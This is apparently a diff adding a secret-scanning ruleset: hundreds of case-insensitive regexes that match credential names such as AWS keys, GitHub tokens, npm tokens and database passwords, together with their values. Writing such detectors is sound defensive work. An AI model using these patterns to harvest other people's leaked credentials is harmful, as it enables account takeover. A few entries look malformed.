+ - "(?i)okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)okta[_-]?client[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ofta[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)ofta[_-]?region(=| =|:| :).{1,32}"
+ - "(?i)ofta[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)octest[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)octest[_-]?app[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)octest[_-]?app[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)oc[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)object[_-]?store[_-]?creds(=| =|:| :).{1,32}"
+ - "(?i)object[_-]?store[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)object[_-]?storage[_-]?region[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)object[_-]?storage[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)oauth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)numbers[_-]?service[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)nuget[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)nuget[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)nuget[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)npm[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)now[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)non[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :).{1,32}"
+ - "(?i)node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :).{1,32}"
+ - "(?i)node[_-]?env(=| =|:| :).{1,32}"
+ - "(?i)ngrok[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ngrok[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)nexuspassword(=| =|:| :).{1,32}"
+ - "(?i)nexus[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)new[_-]?relic[_-]?beta[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)netlify[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)nativeevents(=| =|:| :).{1,32}"
+ - "(?i)mysqlsecret(=| =|:| :).{1,32}"
+ - "(?i)mysqlmasteruser(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?root[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?hostname(=| =|:| :).{1,32}"
+ - "(?i)mysql[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)my[_-]?secret[_-]?env(=| =|:| :).{1,32}"
+ - "(?i)multi[_-]?workspace[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)multi[_-]?workflow[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)multi[_-]?disconnect[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)multi[_-]?connect[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)multi[_-]?bob[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)minio[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)minio[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mile[_-]?zero[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mh[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)mh[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)mg[_-]?public[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mg[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mapboxaccesstoken(=| =|:| :).{1,32}"
+ - "(?i)mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)mapbox[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)mapbox[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)manifest[_-]?app[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)manifest[_-]?app[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)mandrill[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)managementapiaccesstoken(=| =|:| :).{1,32}"
+ - "(?i)management[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)manage[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)manage[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?pub[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?pub[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?priv[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)mailgun[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailer[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)mailchimp[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mailchimp[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)mail[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)magento[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)magento[_-]?auth[_-]?username (=| =|:| :).{1,32}"
+ - "(?i)magento[_-]?auth[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)ll[_-]?shared[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)ll[_-]?publish[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)linux[_-]?signing[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)lighthouse[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)lektor[_-]?deploy[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)lektor[_-]?deploy[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)leanplum[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)kxoltsn3vogdop92m(=| =|:| :).{1,32}"
+ - "(?i)kubeconfig(=| =|:| :).{1,32}"
+ - "(?i)kubecfg[_-]?s3[_-]?path(=| =|:| :).{1,32}"
+ - "(?i)kovan[_-]?private[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)keystore[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)kafka[_-]?rest[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)kafka[_-]?instance[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)kafka[_-]?admin[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)jwt[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)jdbc:mysql(=| =|:| :).{1,32}"
+ - "(?i)jdbc[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)jdbc[_-]?databaseurl(=| =|:| :).{1,32}"
+ - "(?i)itest[_-]?gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)internal[_-]?secrets(=| =|:| :).{1,32}"
+ - "(?i)integration[_-]?test[_-]?appid(=| =|:| :).{1,32}"
+ - "(?i)integration[_-]?test[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)index[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)ij[_-]?repo[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)ij[_-]?repo[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)hub[_-]?dxia2[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)hockeyapp[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)heroku[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)heroku[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)heroku[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)hab[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)hab[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)grgit[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)gren[_-]?github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)gradle[_-]?signing[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)gradle[_-]?publish[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)gradle[_-]?publish[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?secret[_-]?keys(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?private[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?passphrase(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?ownertrust(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?keyname(=| =|:| :).{1,32}"
+ - "(?i)gpg[_-]?key[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?private[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?maps[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?client[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?client[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)google[_-]?account[_-]?type(=| =|:| :).{1,32}"
+ - "(?i)gogs[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)gitlab[_-]?user[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?tokens(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?repo(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?release[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?pwd(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?oauth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?oauth(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?hunter[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?hunter[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?deployment[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?auth(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)github[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?committer[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?committer[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?author[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)git[_-]?author[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)ghost[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)ghb[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?repo[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?oauth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)gh[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)gcs[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)gcr[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)gcloud[_-]?service[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)gcloud[_-]?project(=| =|:| :).{1,32}"
+ - "(?i)gcloud[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?pw(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?login(=| =|:| :).{1,32}"
+ - "(?i)ftp[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)fossa[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)flickr[_-]?api[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)flickr[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)flask[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)firefox[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)firebase[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)firebase[_-]?project[_-]?develop(=| =|:| :).{1,32}"
+ - "(?i)firebase[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)firebase[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)firebase[_-]?api[_-]?json(=| =|:| :).{1,32}"
+ - "(?i)file[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)exp[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)eureka[_-]?awssecretkey(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?sonatype[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?heroku[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)env[_-]?github[_-]?oauth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)end[_-]?user[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)encryption[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)elasticsearch[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)elastic[_-]?cloud[_-]?auth(=| =|:| :).{1,32}"
+ - "(?i)dsonar[_-]?projectkey(=| =|:| :).{1,32}"
+ - "(?i)dsonar[_-]?login(=| =|:| :).{1,32}"
+ - "(?i)droplet[_-]?travis[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)dropbox[_-]?oauth[_-]?bearer(=| =|:| :).{1,32}"
+ - "(?i)doordash[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)dockerhubpassword(=| =|:| :).{1,32}"
+ - "(?i)dockerhub[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?postgres[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?passwd(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)docker[_-]?hub[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :).{1,32}"
+ - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :).{1,32}"
+ - "(?i)digitalocean[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)dgpg[_-]?passphrase(=| =|:| :).{1,32}"
+ - "(?i)deploy[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)deploy[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)deploy[_-]?secure(=| =|:| :).{1,32}"
+ - "(?i)deploy[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)ddgc[_-]?github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :).{1,32}"
+ - "(?i)ddg[_-]?test[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?pw(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)db[_-]?connection(=| =|:| :).{1,32}"
+ - "(?i)datadog[_-]?app[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)datadog[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?port(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)database[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)danger[_-]?github[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cypress[_-]?record[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)coverity[_-]?scan[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)coveralls[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)coveralls[_-]?repo[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)coveralls[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cos[_-]?secrets(=| =|:| :).{1,32}"
+ - "(?i)conversation[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)conversation[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)contentful[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)consumerkey(=| =|:| :).{1,32}"
+ - "(?i)consumer[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)conekta[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)coding[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)codecov[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)codeclimate[_-]?repo[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)codacy[_-]?project[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cocoapods[_-]?trunk[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cocoapods[_-]?trunk[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)cn[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)cn[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :).{1,32}"
+ - "(?i)clu[_-]?repo[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)cloudinary[_-]?url[_-]?staging(=| =|:| :).{1,32}"
+ - "(?i)cloudinary[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)cloudflare[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)cloudflare[_-]?auth[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)cloudflare[_-]?auth[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)cloudflare[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?service[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?processed[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?parsed[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?order[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?instance(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?audited[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloudant[_-]?archived[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)cloud[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)clojars[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)claimr[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)claimr[_-]?superuser(=| =|:| :).{1,32}"
+ - "(?i)claimr[_-]?db(=| =|:| :).{1,32}"
+ - "(?i)claimr[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)ci[_-]?user[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ci[_-]?server[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)ci[_-]?registry[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)ci[_-]?project[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)ci[_-]?deploy[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)chrome[_-]?refresh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)chrome[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)cheverny[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cf[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)certificate[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)censys[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)cattle[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :).{1,32}"
+ - "(?i)cattle[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)cargo[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)bx[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)bx[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)bundlesize[_-]?github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)browserstack[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)browser[_-]?stack[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?pwd(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?pass[_-]?prod(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?auth(=| =|:| :).{1,32}"
+ - "(?i)bluemix[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)bintraykey(=| =|:| :).{1,32}"
+ - "(?i)bintray[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)bintray[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)bintray[_-]?gpg[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)bintray[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)bintray[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)b2[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)b2[_-]?app[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)awssecretkey(=| =|:| :).{1,32}"
+ - "(?i)awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)awscn[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)awsaccesskeyid(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?secrets(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?config[_-]?secretaccesskey(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?config[_-]?accesskeyid(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aws[_-]?access(=| =|:| :).{1,32}"
+ - "(?i)author[_-]?npm[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)author[_-]?email[_-]?addr(=| =|:| :).{1,32}"
+ - "(?i)auth0[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)auth0[_-]?api[_-]?clientsecret(=| =|:| :).{1,32}"
+ - "(?i)auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)assistant[_-]?iam[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)artifacts[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)artifacts[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)artifacts[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)artifactory[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)argos[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)apple[_-]?id[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)appclientsecret(=| =|:| :).{1,32}"
+ - "(?i)app[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)app[_-]?secrete(=| =|:| :).{1,32}"
+ - "(?i)app[_-]?report[_-]?token[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)app[_-]?bucket[_-]?perm(=| =|:| :).{1,32}"
+ - "(?i)apigw[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)apiary[_-]?api[_-]?key(=| =|:| :).{1,32}"
